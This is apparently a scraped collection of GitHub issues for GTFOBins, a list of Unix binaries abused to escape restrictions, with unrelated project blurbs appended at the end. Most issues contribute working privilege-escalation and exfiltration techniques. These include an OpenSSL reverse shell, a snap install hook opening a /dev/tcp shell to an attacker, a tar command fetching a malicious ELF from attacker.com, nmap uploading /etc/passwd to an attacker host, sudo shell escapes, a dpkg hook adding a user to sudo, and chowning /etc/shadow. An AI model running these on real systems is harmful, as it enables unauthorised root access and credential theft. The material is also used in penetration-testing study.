GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Find the project at https://gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Home Page: https://gtfobins.github.io
License: GNU General Public License v3.0
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Find the project at https://gtfobins.github.io
It's the same if it's suid, but it's not by default anywhere I can think of.
sudo ispell <file with misspelled words according to dictionary>
!sh
Caveat, if not specified, It ships with English dictionaries (I believe both GB and US), but various distributions may package it with appropriate dictionaries if the system is configured correctly.
I don't come across it as much as aspell, but I come across it plenty.
https://www.cs.hmc.edu/~geoff/ispell.html
https://www.gnu.org/software/ispell/
Terminal: termite V15
Ncat version: 7.80
OpenSSL version: OpenSSL 1.1.1e 17 Mar 2020
OS: Arch Linux
Kernel: 5.5.10.a-1-hardened
Hi guys!
I had a lot of issues with the OpenSSL reverse shell. Like disconnections, latency etc... I found out after some tests that the flag -no_ign_eof is causing issues when you upgrade your shell to a fully interactive tty.
Example with screens:
Attacker box:
ncat --ssl -lnvp 4444 or openssl s_server -quiet -cert /tmp/cert.pem -key /tmp/key.pem -port 4444
Victim box:
rm /tmp/s; mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect localhost:4444 > /tmp/s; rm /tmp/s
I then initiate the procedure to upgrade to a fully interactive tty shell
SHELL=/bin/bash script -q /dev/null
CTRL+Z
stty raw -echo
fg
reset
Then at this point, if I do an uppercase "R": it crashes my reverse shell with the following information:
RENEGOTIATING
119157357475136:error:1420410A:SSL routines:SSL_renegotiate:wrong ssl version:ssl/ssl_lib.c:2127:
UPDATE: it's the same with a lowercase "k": it crashes but with the "KEYUPDATE" reason.
If I remove the -no_ign_eof, I do not have any problem with the reverse shell and I can do an uppercase "R" when upgrading my OpenSSL reverse shell without connection crash/disconnection.
My question is:
Is this argument really necessary? I did not encounter any problem while not using it tho it may need more testing. Are you able to reproduce this on your side?
Regards
Seems like /usr/bin/bundle and /usr/bin/bundler are both installed with the bundler gem.
They were different once, but are now identical except for name:
Currently only the CAP_SETUID capability is supported. I propose we expand the category to support other exploitable capability types, such as CAP_SYS_PTRACE. As long as the capability provides some sort of shell, arb read, arb write etc primitive, it should be valid to go in GTFOBins.
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/resources.html#GTFOBins
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.
The badge shows to your community that your are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make the project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care.
Hi,
Would you be interested in a way to exploit this kind of sudo rules?
%grp ALL=(ALL:ALL) /usr/bin/apt-get install *
%grp ALL=(ALL:ALL) /usr/bin/apt-get remove *
I see you already have it for apt-get
but sometimes sysadmins will only allow sub commands of apt
, thinking that they are safe this way.
Is there a license for using this?
I have an idea for a project and want to make sure im not going to be breaking any license.
I keep getting an error page after it loads for sometime.
Note that in bash (but not in Bourne shell) you can use <<<
(here-string) to put a string in the standard input, instead of echo
and pipe. So a file-write operation with tee
would be:
./tee -a "$LFILE" <<< 'data'
instead of
echo data | ./tee -a "$LFILE"
This is not specific to tee
, but relevant to all uses of echo
in this repo. Not sure where is the correct place to mention this.
It would be interesting to add a second line assigning permissions to the user you would like to escalate. Since NPM needs write permission on the folder you create.
TF=$(mktemp -d)
chmod 777 $TF
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo -u serv-manage npm -C /tmp/tmp.22ePTsET6U --unsafe-perm i
Thanks.
While doing the challenges for the first module of pwn.college I found a way to read files with an SUID version of gcc.
Following the format of other examples, this is how to reproduce:
sudo sh -c 'cp $(which gcc) .; chmod +s ./gcc'
LFILE=file_to_read
./gcc -x c "$LFILE"
Assuming the privileged file is not valid C code, much if not all of its lines should be output within syntax error messages.
Is this the kind of example that would be worth adding?
Hello!
I noticed in https://gtfobins.github.io, there isn't anything mentioned for ways to GTFO of snap ... "i.e. snap install".
There was a recent CTF machine where this was a way to get root taking advantage of the sudo permissions:
(root) NOPASSWD: /usr/bin/snap install *
Here are some references on how to exploit this:
https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py
Here is a script I wrote using the following references and updated to reflect my environment:
Note: My firewall was affecting the build process, so I temporarily disable it in this script.
./buildSnap.sh
## Install necessary tools
sudo snap install snapcraft --classic
## Disable firewall
sudo ufw disable
## Make an empty directory to work with
cd ~/Documents
mkdir revshell_snap
cd revshell_snap
## Initialize the directory as a snap project
snapcraft init
## Set up the install hook
mkdir snap/hooks
touch snap/hooks/install
chmod a+x snap/hooks/install
## Write the script we want to execute as root
cat > snap/hooks/install << "EOF"
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/attackerip/attackerport 0>&1'
EOF
## Configure the snap yaml file
cat > snap/snapcraft.yaml << "EOF"
name: revshell
base: core
version: '1.0'
summary: Runs exploit bash script when installed
description: Runs exploit bash script when installed
grade: devel
confinement: devmode
parts:
my-part:
plugin: nil
EOF
## Build the snap
snapcraft
## Re-enable firewall
sudo ufw enable
## Move
mv revshell_1.0_amd64.snap ../revshell.snap
Then you would install the snap and it would run the install hook script when it installs ...
sudo snap install revshell.snap --dangerous --devmode
Let me know if this is something worth adding the GTFO repository going forward!
Thanks!
Hi
Before submitting a PR I would like to hear your opinion.
Would it make sense to create a new function for wildcard / parameter injection possibilities?
This function would address all binaries which could be used to execute a function via a command line argument.
A well-known example is the tar command and the arguments --checkpoint-action=exec="chmod +s `which dash`" --checkpoint=1
as e.g. documented here: https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/
I'm aware that this command execution method is already documented in GTFOBins, but it cannot be identified as wildcard or parameter injection. A new category would make sense for me to quickly identify binaries which can be abused for privesc if one or more parameters can be controlled.
What do you think?
THX
Hi,
I just want to know if I understand the information here correctly.
Supposedly for cat
, a File read means that it will read data outside a restricted file system.
I tried to run this in Ubuntu.
LFILE=/root/my_file.txt
cat "$LFILE"
However it still gave me "Permission denied"
Is there a limitation for this to work?
Thanks.
the option --use-askpass doesn't work anymore in the newer version of wget
we can use a solution described here:
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-wget-privilege-escalation/#4.-transfer-the-content-of-the-shadow-file
that is still present in wget make use of file upload and file download sections
If there is instead a better option that do not waste shadow files should be great
--to-command=COMMAND
pipe extracted files to another program
For example:
echo -e '#!/bin/bash\n\nwget http://attacker.com/malicious.elf' > script.sh
tar -cvf script.tar script.sh
sudo tar -xvf script.tar --to-command /bin/bash
Source: https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html
Hello, the given File Read command didn't really work for me but I found out another way to read the file
genisoimage -sort "$LFILE"
https://gtfobins.github.io/gtfobins/genisoimage/
genisoimage -sort /flag
If the wireshark gui loads the Lua plugin then it is possible to execute any Lua code.
Tools -> Lua -> Evaluate:
os.execute("xterm")
I might be wrong, but I think this commit is accidental, and bash wasn't supposed to be removed.
If thats the case, happy to send a PR.
ssh, nc/ncat/socat/openssl, bash /dev/tcp redirects, et al can be used to forward ports to access more systems.
If you have a 3-machine ssh-chain, say A->B->C, where B->C is a forced ssh command, then unless the forced command includes -e none
you can interact with this second client using ~~C
(a tilde per ssh client in the chain) to add -L
, -R
, and -D
forwards. It is common for servers with forced commands to block port forwarding, but easy to not know about the escape sequence which effectively re-enables them under this (rare) configuration.
For the following binary, https://gtfobins.github.io/gtfobins/ssh-keygen/, Instructions stated on the document is not enough. I would like to add more info like generating a valid shared object file. How can I add it? If I add it to the description, then it may overwrite default description. Otherwise I have to add it as function But currently I don't see any suitable function for it. Can you add a suitable function for that or Can you guide me if it's possible add examples?
If author doesn't respond or anyone looking for the answer to ssh-keygen
binary, then this is how you can generate a valid shared object file. This is much useful when ssh-keygen
binary has suid bit:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int C_GetFunctionList(){
setuid(geteuid());
system("id"); //Your command
printf("\n"); //New line is important
return 1;
}
Save above file as lib.c
and compile using below command:
gcc -shared -o lib.so -fPIC lib.c
Then execute:
ssh-keygen -D ./lib.so
Some versions of Snap will not try to install a package with a single character as its name. Snap's GTFOBin can be made more widely usable by changing fpm -n x -s dir -t snap -a all meta
to something like fpm -n test -s dir -t snap -a all meta
and likewise sudo snap install x_1.0_all.snap --dangerous --devmode
to sudo snap install test_1.0_all.snap --dangerous --devmode
.
Without this change, snap will error out with error: cannot read snap file: invalid snap name: "x"
and not execute the given command.
From fallofsudo:
sudo dmesg --human
!/bin/bash
i uploaded you code on hacksudo.github.io but unable to get search result issue is
Binary | Functions |
---|---|
No binary matches... |
Good day,
https://manpages.debian.org/stretch/procps/top.1.en.html#6c._ADDING_INSPECT_Entries
https://gitlab.com/procps-ng/procps/blob/master/top/top.c#L2996
It's a bit of a pain, since it requires an arbitrary append to ~/.toprc
to add a custom inspect entry and it's really picky about this file format. Example, choose W
to write a default ~/.toprc, then append:
...
pipe^IRun arbitrary code as root^Iid
Then run top
and choose Y
to inspect a process, and chose your custom inspect entry
Inspection View at pid: 3986, running myprocess. Locating: N/A
Use: left/right/up/down/etc to navigate the output; 'L'/'&' to locate/next.
Or: <Enter> to select another; 'q' or <Esc> to end !
Run arbitrary code as root: 1-1 lines, 1-121 columns, 77 bytes read
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Is this worth writing up in a pull request? It might be a while before I get to it. If someone else wants the glory, it's cool with me. 😁
Hello.
Sorry I have a not enough time for creating pull request.
I want to suggest a few tricks who helped me with exploting "https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection" without direct access to file system.
nc -nv -lp 80
nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
php -S 0.0.0.0:80 -t . router_with_directory_listing.php
nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'
There are a lot of things listed here that are examples of "use of privileges results in use of privileges". As an example, your listing for cat
includes:
File read -
"It reads data from files," - It sure does!
"it may be used to do privileged reads" - Iff the parent process is privileged, in which case, the cat (no pun intended) is out of the bag.
"or disclose files outside a restricted file system." - What does that even mean?
This applies to all instances of "File read", not just cat
.
SUID -
"It runs with the SUID bit set" - Not on my box. Not any anybody's box (within experimental error).
"This example creates a local SUID copy of the binary and runs it to maintain elevated privileges." - If you have the capability to add SUID to cat
, you don't need to add SUID to cat
.
This applies to all instances of "SUID", not just cat
.
Sudo -
"It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo." - That's literally what sudo
is designed to do. Running sudo
results in elevated privileges, by design.
This applies to all instances of "Sudo", not just cat
.
When: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash to get root
screen -x root/root
Run it and youll be root if the binary is SUID
First of all thanks for this interesting project.
I've already made a post on (sorry for the cross-post)
https://security.stackexchange.com/questions/197900/command-line-tools-exploitable-on-linux
But I've decided to post here too because I'm interested in your opinion.
As said in the post above, why do you consider mv
(is only an example) as a dangerous command line tool?
Ok, I can write in a un-permitted file if the SUID
bit is set, but:
SUID
bit can be potentially dangerousmv
with SUID
bit set in any distributionWhy do you have "blacklisted" this command?
I've the same doubts on other commands.
Especially if it’s a CI-generated script.
I’m very curious about the various machines I use and whether they are vulnerable to non-privileged users running these commands.
Would love a pass/fail that takes a filename as a param for those tests that attempt to read files.
Linux is saved to a file after looking at suid and guid on the computer.
In this way, the following captured data can be compared with two files.
curl https://gtfobins.github.io |grep '<li><a href="/gtfobins/'| grep "#suid"| cut -d / -f 3
I have this script that works this way. But it doesn't work very well.
https://github.com/ihack4falafel/OSCP/blob/master/BASH/SUIDChecker.sh
Do you have any idea about it?
Have a good day.
Hi!
The section about SUID with only mentoins this option:
./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
This can be added:
./vim -c ':set shell=/bin/sh\ -p|shell'
benefit is that this doesn't require python support.
Sorry for opening an issue and not doing a PR but I don't have lot of time, you will do it faster than me.
These new ways are from the FallofSudo project.
Here are some other tools:
Connect to a valid SMB or CIFS share:
sudo smbclient \\ip\share -U username
smb:> !/bin/bash
mysql
sudo mysql -e '\! /bin/bash'
apt-get
sudo apt-get changelog bash
!/bin/bash
Just came across this technique on a Hack the box machine. I guess it would be good to have it as a technique GTFOBins.
Some sources: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
I just recently used 7zr on Linux as a way of adding a python file to an archive and then extracting it into a root owned directory as an unprivileged user.
We should add this as another method when sudo privileges are set on 7zr.
If ldconfig binary is suid, it would be possible to change library path loaded by other binaries in order to hijack libs.
I don't know how to create a good example to add it to the list but I think it should be added.
Here are 2 different examples:
Thanks
Reading text file in NodeJS:
require('fs').readFile('/path/to/file', {encoding: 'utf-8'}, function(err, data) {
console.log(data);
});
The reason I ask is because of this tool repository that I created a while back: syscaller
Currently all file writes are kept in the single category File Write
.
However not all file writes are equal. Some, such as cp
, dd
, and mv
give you full control over the content of the file to be written, which is a powerful primitive and highly exploitable.
Whereas some, such as nmap #153, by the author's own definition "I've yet to come up with a way to overwrite the contents of the system file according to what we want,"
I propose the creation of a Limited File Write
category, that allows us to more effectively categorize file writes into bins that either
I'd be happy to help categorize should this go ahead.
dpkg -i -o DPkg::Pre-Install-Pkgs::="usermod -a -G sudo $(whoami)" any_package.deb
hey there. i was doing a ctf and didn't see cap_chown related capability in Ruby.
thought it would be great to add following to Ruby CAPABILITIES section.
echo "File.chown(id,nil,'/file/to/chown')" > chown.rb
chmod +x chown.rb
ruby chown.rb
-example:
echo "File.chown(1003,nil,'/etc/shadow') > chown.rb
Hey! Could we colorize the vuln tags, so that it is easy to see the most dangerous programs at a glance?
Hi,
Not tested but should work.
Create a deb using fpm:
# fpm -s dir -t deb –name sploit –before-install BS_package/foo.sh BS_package/
Load our deb with dpkg
sudo dpkg -i exploit.deb
Have a nice day
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.